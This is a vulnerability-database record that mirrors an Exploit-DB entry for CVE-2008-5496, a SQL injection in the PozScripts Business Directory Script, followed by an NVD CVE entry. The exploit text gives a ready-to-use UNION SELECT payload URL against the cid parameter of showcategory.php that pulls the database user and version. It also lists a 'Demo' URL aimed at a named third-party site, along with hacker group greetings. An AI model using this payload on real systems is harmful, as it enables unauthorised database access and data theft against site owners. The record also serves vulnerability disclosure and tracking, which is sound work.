{"id": "EDB-ID:7098", "hash": "249c7437f3dfe0477a54ef10d00e9c8b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PozScripts Business Directory Script cid Remote SQL Injection Vuln", "description": "PozScripts Business Directory Script (cid) Remote SQL Injection Vuln. CVE-2008-5496. Webapps exploit for php platform", "published": "2008-11-11T00:00:00", "modified": "2008-11-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7098/", "reporter": "Hussin X", "references": [], "cvelist": ["CVE-2008-5496"], "lastseen": "2016-02-01T01:24:28", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/7098/", "sourceData": "|___________________________________________________\n|\n| Business Directory Script ( cid) Remote SQL Injection Vulnerability\n|\n|___________________________________________________\n|-------------------- Hussin X -------------------\n|\n| Author: Hussin X\n|\n| Home : WwW.IQ-ty.CoM\n|\n| email: darkangel_g85[at]Yahoo[DoT]com\n|\n|___________________________________________________\n|\n| script : http://www.pozscripts.com/product_details.php?item_id=6\n|\n| DorK : :) \n|___________________________________________________\n\nExploit:\n________\n\n\n\nwww.[target].com/Script/showcategory.php?cid=-264+union+select+1,concat(user(),0x3e,version()),3,4,5--\n\n\n\nDemo\n________\n\nhttp://www.singwebs.com/businessdirectoryadmindemo/showcategory.php?cid=-264+union+select+1,concat(user\n\n(),0x3e,version()),3,4,5--\n\n\n\n\n____________________________( Greetz )_________________________________\n|\n| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |\n|\n| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr\n|\n| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K\n|_____________________________________________________________________\n\n\n Im IRAQi | Im TrYaGi\n\n# milw0rm.com [2008-11-11]\n", "osvdbidlist": ["49822"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-09-29T14:26:14", "references": ["http://www.vupen.com/english/advisories/2008/3118", "http://securityreason.com/securityalert/4714", "https://exchange.xforce.ibmcloud.com/vulnerabilities/46558", "https://www.exploit-db.com/exploits/7098", "http://www.securityfocus.com/bid/32264"], "description": "SQL injection vulnerability in showcategory.php in PozScripts Business Directory Script allows remote attackers to execute arbitrary SQL commands via the cid parameter.", "edition": 3, "reporter": "NVD", "published": "2008-12-12T11:30:00", "title": "CVE-2008-5496", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:14", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-5496"], "scanner": [], "modified": "2017-09-28T21:32:38", "cpe": ["cpe:/a:pozscripts:business_directory_script"], "id": "CVE-2008-5496", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5496", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}